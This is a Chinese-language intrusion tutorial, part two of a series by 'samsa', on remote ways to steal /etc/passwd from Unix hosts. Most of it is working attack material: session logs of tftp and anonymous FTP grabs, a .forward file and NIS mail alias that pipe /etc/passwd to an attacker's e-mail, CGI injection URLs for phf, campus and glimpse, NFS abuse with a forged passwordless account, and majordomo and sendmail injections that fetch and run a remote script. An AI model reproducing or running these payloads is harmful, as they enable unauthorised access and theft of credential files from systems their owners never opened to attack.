samsa网络入侵教程二

/ns/cn/jc/data/20010129103801.htm

二、隔山打牛(远程攻击)
1) 隔空取物:取得passwd
1.1) tftp

# tftp numen
tftp> get /etc/passwd
Error code 2: Access violation
tftp> get /etc/shadow
Error code 2: Access violation
tftp> quit

(samsa:一无所获,但是...)

# tftp sun8
tftp> get /etc/passwd
Received 965 bytes in 0.1 seconds
tftp> get /etc/shadow
Error code 2: Access violation

(samsa:成功了!!!;-)

# cat passwd
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
ylx:x:10007:10::/users/ylx:/bin/sh
wzhou:x:10020:10::/users/wzhou:/bin/sh
wzhang:x:10101:4:Walt Whiteman:/users/wzhang:/sbin/sh

(samsa:可惜是shadow过了的:-/)

1.2) 匿名ftp
1.2.1) 直接获得

# ftp sun8
Connected to sun8.
220 sun8 FTP server (UNIX(r) System V Release 4.0) ready.
Name (sun8:root): anonymous
331 Guest login ok, send ident as password.
Password:

(samsa:your e-mail address,当然,是假的:->)

230 Guest login ok, access restrictions apply.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.168.0.198,34243) (0 bytes).
bin
dev
etc
incoming
pub
usr
226 ASCII Transfer complete.
35 bytes received in 0.85 seconds (0.04 Kbytes/s)
ftp> cd etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.168.0.198,34244) (0 bytes).
group
passwd
226 ASCII Transfer complete.
15 bytes received in 0.083 seconds (0.18 Kbytes/s)
ftp> get passwd
200 PORT command successful.
150 ASCII data connection for passwd (192.168.0.198,34245) (223 bytes).
226 ASCII Transfer complete.
local: passwd remote: passwd
231 bytes received in 0.038 seconds (5.98 Kbytes/s)

# cat passwd
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nobody:x:60001:60001:Nobody:/:
ftp:x:210:12::/export/ftp:/bin/false

(samsa:正常!把完整的 passwd 放在匿名ftp目录下的笨蛋太少了)

1.2.2) ftp 主目录可写

# cat forward_sucker_file
"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr"
# ftp victim.com
Connected to victim.com
220 victim FTP server ready.
Name (victim.com:zen): ftp
331 Guest login ok, send ident as password.
Password:[your e-mail address:forged]
230 Guest login ok, access restrictions apply.
ftp> put forward_sucker_file .forward
43 bytes sent in 0.0015 seconds (28 Kbytes/s)
ftp> quit
# echo test | mail ftp@victim.com

(samsa:等着passwd文件随邮件来到吧...)

1.3) WWW
著名的cgi大bug
1.3.1) phf
http://silly.com/cgi-bin/nph-test-cgi?*
http://silly.com/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
1.3.2) campus
http://silly.edu/cgi-bin/campus?%0a/bin/cat%0a/etc/passwd
1.3.3) glimpse
http://silly.com/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5me\@my.e-mail.
addr\</etc/passwd;eval$CMD;echo

(samsa:行太长,折了折,不要紧吧? ;-)

1.4) nfs
1.4.1) 如果把/etc共享出来,就不必说了
1.4.2) 如果某用户的主目录共享出来

# showmount -e numen
export list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
# mount -F nfs numen:/space/users/zw /mnt
# cd /mnt
# ls -ld .
drwxr-xr-x 6 1005 staff 2560 1999 5月 11 .
# echo zw:x:1005:1:temporary break-in account:/:/bin/sh >> /etc/passwd
# echo zw::::::::: >> /etc/shadow
# su zw
$ cat >.forward
"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr"
^D
# echo test | mail zw@numen

(samsa:等着你的邮件吧....)

1.5) sniffer
利用ethernet的广播性质,偷听网络上经过的IP包,从而获得口令。
关于sniffer的原理和技术细节,见[samsa 1999].

(samsa:没什么意思,有种``胜之不武''的感觉...)

1.6) NIS
1.6.1) 猜测域名,然后用ypcat(或对于NIS+:niscat)可获得passwd(甚至shadow)
1.6.2) 若能控制NIS服务器,可创建邮件别名

nis-master # echo 'foo: "| mail me@my.e-mail.addr < /etc/passwd "' >> /etc/alia
nis-master # cd /var/yp
nis-master # make aliases
nis-master # echo test | mail -v foo@victim.com

1.7) e-mail
e.g.利用majordomo(ver. 1.94.3)的漏洞
Reply-to: a~.`/usr/bin/rcp\${IFS}me@hacker.home.edu:script\${IFS}/tmp
/script&&source\${IFS}/tmp/script`.q~a/ad=cucu/c=scapegoat\\\@his.e-mai

# cat script
/bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr
#

Connected to victim.com
Escape character is '^]'.
220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: "|/bin/mail me@my.e-mail.addr < /etc/passwd"
250 "|/bin/mail me@my.e-mail.addr < /etc/passwd"... Sender ok
rcpt to: nosuchuser
550 nosuchuser... User unknown
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Connection closed by foreign host.

(samsa:wait...)